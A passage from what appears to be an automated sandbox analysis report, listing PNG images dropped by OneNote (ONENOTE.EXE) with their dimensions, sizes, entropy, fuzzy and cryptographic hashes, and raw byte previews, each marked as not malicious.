                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
